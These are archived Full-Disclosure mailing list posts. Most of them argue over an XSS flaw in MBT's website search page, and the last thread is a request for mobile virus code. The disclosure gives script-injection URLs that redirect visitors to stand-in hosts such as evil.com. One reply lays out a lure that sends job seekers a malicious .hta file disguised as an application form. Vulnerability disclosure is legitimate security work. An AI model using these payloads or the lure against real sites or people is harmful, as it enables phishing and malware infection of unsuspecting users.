Re: [Full-disclosure] MBT Xss vulnerability
Hii Bro, I got the point.You meant to say that Xss for each and every site should not be posted here, unless n until it attracts heavy traffic like Yahoo etc. I agree to this that MBT doesnt attract that amount of traffic normally but you can target millions of users at one go. Like say...there are many groups that post new job vacancies everyday. So if i create a url with _javascript_ allowing you to download a file with say .hta extension and it claims itself to be some form that has to be filled by victim in order to apply for job. For eg. http://www.mahindrabt.com/jse/jsp/search.jsp?q=scriptdocument.location='www.evil.com/applicationform.hta'/script If you post this URL in any of the above groups, you can be sure that your file will be downloaded by thousands of users. This is because MBT is one of the top employers. Believe me. Before some one downloads such files and gets his machine compromised, i just wanted to warn the users. As number of victims could be large enough to create havoc, MBT's Xss vuln was of great concern to me.This is what made me post this vuln over here. May be i might have posted it in the wrong list. If this is the case, i am sory to cause annoyance to you and others. Regards; Santosh J. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] MBT Xss vulnerability
Hahaha ... native code doesnt seem to understand the meaning of Xss and why it can be of security concern. Here not only url re-direction is possible but also execution of malicious _javascript_s is possible.Your Lame reply makes me think that you areone of the following: 1.An employee of MBT criticising me in the interest of the company 'or' 2.A poor spammer who doesnt know anything but tries to shows-off as if he is the MASTER. If this is the case carry on with your spamming business and good luck for your future. Regards; Santosh J. On 1/20/06, [EMAIL PROTECTED] [EMAIL PROTECTED] wrote: Actually,Whats lame is you basing someone for telling others about asecurity vulnerability. Keep posting! -Adriel-Original Message-From: Native.Code [EMAIL PROTECTED]To: MuNNa [EMAIL PROTECTED] Cc: full-disclosure@lists.grok.org.ukSent: Thu, 19 Jan 2006 21:52:54 +0800Subject: Re: [Full-disclosure] MBT Xss vulnerabilityWhat a lame vulnerability it is. If your POC redirects to another site (which is not MBT site), how someone will become victim andbelieve that he/she is doing business with MBT?Your post is yet another proof that FD is more and more inhibited byscipt kiddies. Get a life! On 1/19/06, MuNNa [EMAIL PROTECTED] wrote:Hii List;Recently, i found an Xss vulnerabilty in MBT web site. MBT offersservices from Consulting to Managed Services.It is the Corporate memberof The International Systems Security Engineering Association (ISSEA).BS 7799 (Information Security Management Framework) certifiedorganizationVulnerability:MBT XSS (Cross Site Scripting) Attacks Criticality:MediumDescription:MBT ( http://www.mahindrabt.com/website/index.htm ) is a leadingIndia-based global IT solutions provider. As a proven leader in application outsourcing and offshoring of business criticalapplications, MBT enables its clients, protect their investment inlegacy systems, enhance capital budgets, reduce operating expenses andbuild solutions for the multi-services future. However it suffers Xss vulnerability on its own web page.Below is the proof-of-concept which explains this -http://www.mahindrabt.com/jse/jsp/search.jsp?q=[Xss malcode here]Re-directing the site to any malicious or fake site to trap the victim :http://www.mahindrabt.com/jse/jsp/search.jsp?q=script document.location='http://www.[evil.site].com'/scriptThough it does not affect sever side alot and may seem harmless, but itcan be used to target college students or job-seekers as it is one of the most attracting employer. Targets can be lured to visit themalicious weblink under the pretext of some job positions being vacant.Vendor notification:Vendor has been notified twice, around 4 months ago but still there is no response and I guess neither they are going to respond.Regards;Santosh J.___Full-Disclosure - We believe in it.Charter: http://lists.grok.org.uk/full-disclosure-charter.htmlHosted and sponsored by Secunia - http://secunia.com/___ Full-Disclosure - We believe in it.Charter: http://lists.grok.org.uk/full-disclosure-charter.htmlHosted and sponsored by Secunia - http://secunia.com/Check Out the new free AIM(R) Mail -- 2 GB of storage andindustry-leading spam and email virus protection. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] MBT Xss vulnerability
Hii -Why would he be concerned? The problem is that most sites on theinternet suffer from XSS vulenrabilities, its just that nobody caresbecause there is nothing to gain from the sites. Nothing to gain you say? Yes. Let's take this site you posted about for example, Ididn't look over the entire site, but glancing I don't even seeanything which XSS would help you compromise. The site seemingly isall static content (minus a search, correct me if I'm wrong) with no e-mail portal, forums, or anything else that the XSS could beleveraged to gain access to. Since the site offeres no directservices (right?) what exactly could you trick people into doing here?The session cookie seems worthless since there's no login or anything... I have clearly mentioned inthe disclosure that this Xss is not harmful for server side but you can target a lot ofpeople, using this website. If you have completly read my disclosure mail, i have mentioned in the end that a lot of people seeking job can be targeted. I can say this because i know the value of this organisationfrompointof placements. Morever this organisation provides security solution to other companies. From the point of comapny's security everything is fine but from the point of its social image.. -Which would be meaningful if:A) this site were used by millions of peopleB) there was something worth compromising the site for (like access towebmail, personal information, etc...) I think what I'm missing here is why this particular XSS is useful inany way shape or form? Am I missing something significant aboutthis site? Do people trust it for something? As explained before , it can attract a lot of job-seekers. Millions of them. They trust this organisation. Even i do very much. -Isn't that what you are doing? Ijust posted a disclosure which i felt could be used by some bad guy to target innocent people.If anyone felt that this disclosure is some sort of spam and is really harmless, just discard it. Atleast i dont spam here by bashing someone else who has posted some disclosure. This bashing attitude reflects Lamer qualities and this discourages others from mailing disclosures. Hope i answered all your answers. Lets cut down the argument here. Regards; Santosh J On 1/20/06, Stan Bubrouski [EMAIL PROTECTED] wrote: On 1/19/06, MuNNa [EMAIL PROTECTED] wrote: Hahaha ... native code doesnt seem to understand the meaning of Xss and why it can be of security concern. Here not only url re-direction is possibleWhy would he be concerned?The problem is that most sites on the internet suffer from XSS vulenrabilities, its just that nobody caresbecause there is nothing to gain from the sites.Nothing to gain yousay?Yes.Let's take this site you posted about for example, Ididn't look over the entire site, but glancing I don't even see anything which XSS would help you compromise.The site seemingly isall static content (minus a search, correct me if I'm wrong) with noe-mail portal, forums, or anything else that the XSS could beleveraged to gain access to.Since the site offeres no direct services (right?) what exactly could you trick people into doing here?The session cookie seems worthless since there's no login oranything... but also execution of malicious _javascript_s is possible.Your Lame replyWhich would be meaningful if:A) this site were used by millions of peopleB) there was something worth compromising the site for (like access towebmail, personal information, etc...)I think what I'm missing here is why this particular XSS is useful in any way shape or form?Am I missing something significant aboutthis site?Do people trust it for something? makes me think that you are one of the following: 1.An employee of MBT criticising me in the interest of the company 'or' 2.A poor spammer who doesnt know anything but tries to shows-off as if he is the MASTER. If this is the case carry on with your spamming business and good luck for your future.Isn't that what you are doing? -sb Regards; Santosh J. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] MBT Xss vulnerability
Hii List; Recently, i found an Xss vulnerabilty in MBT web site. MBT offers services from Consulting to Managed Services.It is the Corporate member of The International Systems Security Engineering Association (ISSEA). BS 7799 (Information Security Management Framework) certified organization Vulnerability: MBT XSS (Cross Site Scripting) Attacks Criticality: Medium Description: MBT (http://www.mahindrabt.com/website/index.htm ) is a leading India-based global IT solutions provider. As a proven leader in application outsourcing and offshoring of business critical applications, MBT enables its clients, protect their investment in legacy systems, enhance capital budgets, reduce operating expenses and build solutions for the multi-services future. However it suffers Xss vulnerability on its own web page. Below is the proof-of-concept which explains this - http://www.mahindrabt.com/jse/jsp/search.jsp?q=[Xss malcode here] Re-directing the site to any malicious or fake site to trap the victim : http://www.mahindrabt.com/jse/jsp/search.jsp?q= scriptdocument.location='http://www.[evil.site].com'/script Though it does not affect sever side alot and may seem harmless, but it can be used to target college students or job-seekers as it is one of the most attracting employer. Targets can be lured to visit the malicious weblink under the pretext of some job positions being vacant. Vendor notification: Vendor has been notified twice, around 4 months ago but still there is no response and I guess neither they are going to respond. Regards; Santosh J. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Mobile Infection
got it guys. My post did not intend any offence. Maybe I was just so upset about the post. I did notice the POC word, but still everything else seemed so suspicious. Peace. On 10/11/05, Peer Janssen [EMAIL PROTECTED] wrote: Kaka Munna wrote: Why would you like to do that?People do research for different purposes. One reason can be know your ennemi in order to better defend yourself.How can you tell the difference regarding the intentions of somebody?Also, people can change. For instance, there are many examples of jerks who turn good guys (tm).And people mature. Why not apply your security knowledge in creating good things (i.e. prevention mechanisms) instead of doing criminal things (i.e. creatingg viruses)? You speak of security knowledge.Tinkering with security holes can be one way to acquire it.People like you should be doomed.Anybody who nourishes any bad intention dooms oneself. I'm not sure there really is any need to add to that.And be careful not to judge anybody.You never know enough about the person to be just in your judgements.Everybody has some dark sides, you too I suppose. And while dooming others, you still sign peace ??GreetingsPeer-Kaka Munna On 10/10/05, *Mark Sec* [EMAIL PROTECTED] mailto:[EMAIL PROTECTED] wrote: Alo folks, Well, im playing with some mobiles, this devices have system like WindowsCE, Symbiam. Blackberry... Im looking the binaries (.exe) or source code virus to do (PoCs) into the devices, obvious with the bluetooth active and vulnerable. I have this link (include the source code virus DUST for to WindowsCE) http://www.informit.com/articles/article.asp?p=337071rl=1 http://www.informit.com/articles/article.asp?p=337071rl=1 does anyone have a links, source, binaries ofthe CABIR virus may be everything about to mobile virus? cheers :-) Mark. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- Peace, 0x497266616E ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/___Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.htmlHosted and sponsored by Secunia - http://secunia.com/ -- Peace,0x497266616E ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
